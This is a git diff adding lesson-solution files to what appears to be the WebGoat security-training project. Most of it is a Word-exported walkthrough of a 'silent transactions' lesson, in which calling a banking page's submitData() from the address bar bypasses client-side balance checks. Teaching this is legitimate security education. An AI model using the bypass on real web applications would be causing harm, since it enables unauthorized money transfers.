+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform Silent Transactions Attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+teaches how to perform silent transactions attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Any system that
+silently processes transactions using a single submission is dangerous to the
+client. For example, if a normal web application allows a simple URL
+submission, a preset session attack will allow the attacker to complete a
+transaction without the user’s authorization. In Ajax, it gets worse: the
+transaction is silent; it happens with no user feedback on the page, so an
+injected attack script may be able to steal money from the client without
+authorization.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This is a
+sample internet banking application - money transfer page.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>It shows
+below your balance, the account you are transferring to and amount you will
+transfer.<br>
+The application uses AJAX to submit the transaction after doing some basic
+client side validations.<br>
+Your goal is to try to bypass the user's authorization and silently execute the
+transaction.<br style='mso-special-character:line-break'>
+<![if !supportLineBreakNewLine]><br style='mso-special-character:line-break'>
+<![endif]><o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_89" o:spid="_x0000_i1028" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SilentTransactions_files/image009.jpg" v:shapes="Picture_x0020_89"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> AJAX Security - Silent transaction attacks</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This web
+application uses JavaScript on the client to initiate a transaction for
+transferring money. Examining the HTML source reveals that two JavaScript
+functions are being used:<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;script&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
+processData(){<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>var accountNo =
+document.getElementById('newAccount').value;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>var amount =
+document.getElementById('amount').value;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>if ( accountNo == ''){<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>alert('Please enter a valid account number to
+transfer to.')<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>return;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>else if ( amount == ''){<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>alert('Please enter a valid amount to
+transfer.')<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>return;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>var balanceValue =
+document.getElementById('balanceID').innerText;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>balanceValue = balanceValue.replace( new
+RegExp('$') , '');<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>if ( parseFloat(amount) &gt;
+parseFloat(balanceValue) ) {<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>alert('You can not transfer more funds than
+what is available in your balance.')<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>return;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>document.getElementById('confirm').value<span
+style='mso-spacerun:yes'>  </span>= 'Transferring'<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>submitData(accountNo,
+amount);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span>document.getElementById('confirm').value<span
+style='mso-spacerun:yes'>  </span>= 'Confirm'<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>balanceValue
+= parseFloat(balanceValue) - parseFloat(amount);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>balanceValue
+= balanceValue.toFixed(2);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>document.getElementById('balanceID').innerText
+= balanceValue + '$';<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
+submitData(accountNo, balance) {<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>var url =
+'/WebGoat/attack?Screen=74&amp;menu=1150&amp;from=ajax&amp;newAccount='+
+accountNo+ '&amp;amount=' + balance +'&amp;confirm=' +
+document.getElementById('confirm').value; <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>if (typeof
+XMLHttpRequest != 'undefined') {<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>req = new
+XMLHttpRequest();<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>} else if
+(window.ActiveXObject) {<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>req = new
+ActiveXObject('Microsoft.XMLHTTP');<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>req.open('GET', url, true);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>req.onreadystatechange = callback;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>   </span>req.send(null);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
+callback() {<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>    </span>if (req.readyState == 4) { <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>        </span>if (req.status == 200) { <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>                   </span>var result =<span
+style='mso-spacerun:yes'>  </span>req.responseText ;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-tab-count:3'>                                    </span><span
+style='mso-spacerun:yes'> </span></span><span lang=NL-BE style='font-family:
+"Arial","sans-serif";mso-ansi-language:NL-BE'>var resultsDiv =
+document.getElementById('resultsDiv');<o:p></o:p></span></p>
+
+<p class=MsoNormal><span lang=NL-BE style='font-family:"Arial","sans-serif";
+mso-ansi-language:NL-BE'><span style='mso-tab-count:4'>                                                </span></span><span
+style='font-family:"Arial","sans-serif"'>resultsDiv.innerHTML = '';<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-tab-count:4'>                                                </span>resultsDiv.innerHTML
+= result;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'>        </span>}}}<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/script&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The function
+processData() is called when the user fills out an account number and an amount
+to transfer. The function processData() will check if the user has sufficient
+balance before initiating the transaction. After validation of the balance, the
+JavaScript function submitData(accountNo, balance) is called which actually
+submits the required information, target account number and the amount to
+transfer, to the back-end web application.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you are
+able to call this JavaScript function submitData(accountNo, balance) from the
+browser, you are able to bypass the client-side validation and execute this
+transaction silently, without an additional approval or digital signature of
+the user.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The latest
+generation of browsers allows to call JavaScript from the address bar, using
+javascript:function();. Try to execute: javascript:submitData(1234556,11000);<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_90"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SilentTransactions_files/image010.jpg" v:shapes="Picture_x0020_90"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Follow the hints....</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_91" o:spid="_x0000_i1026"
+ type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/SilentTransactions_files/image011.jpg" v:shapes="Picture_x0020_91"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTP Request generated from Javascript function
+submitData(123456,110000);</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_92" o:spid="_x0000_i1025"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/SilentTransactions_files/image012.jpg" v:shapes="Picture_x0020_92"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/SilentTransactions_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SilentTransactions_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/filelist.xml b/main/project/WebContent/lesson_solutions/SilentTransactions_files/filelist.xml
new file mode 100644
index 000000000..dbcf5ad0e
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SilentTransactions_files/filelist.xml
@@ -0,0 +1,14 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../SilentTransactions.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image010.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image011.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image012.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image001.png b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image001.png
new file mode 100644
index 000000000..61f7e63a1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image003.png b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image003.png
new file mode 100644
index 000000000..faf59c077
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image005.png b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image005.png
new file mode 100644
index 000000000..4f4f0608a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image007.png b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image007.png
new file mode 100644
index 000000000..04494b197
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image009.jpg b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image009.jpg
new file mode 100644
index 000000000..b2529e37c
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image010.jpg b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image010.jpg
new file mode 100644
index 000000000..da2d8692a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image010.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image011.jpg b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image011.jpg
new file mode 100644
index 000000000..efdefff06
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image011.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/image012.jpg b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image012.jpg
new file mode 100644
index 000000000..8375ab7cd
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/image012.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/SilentTransactions_files/themedata.thmx b/main/project/WebContent/lesson_solutions/SilentTransactions_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/SilentTransactions_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/SoapRequest.html b/main/project/WebContent/lesson_solutions/SoapRequest.html
new file mode 100644
index 000000000..f1e1a5059
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/SoapRequest.html
@@ -0,0 +1,874 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/SoapRequest_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SoapRequest_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>39</o:TotalTime>
+  <o:Created>2007-07-11T14:06:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:21:00Z</o:LastSaved>
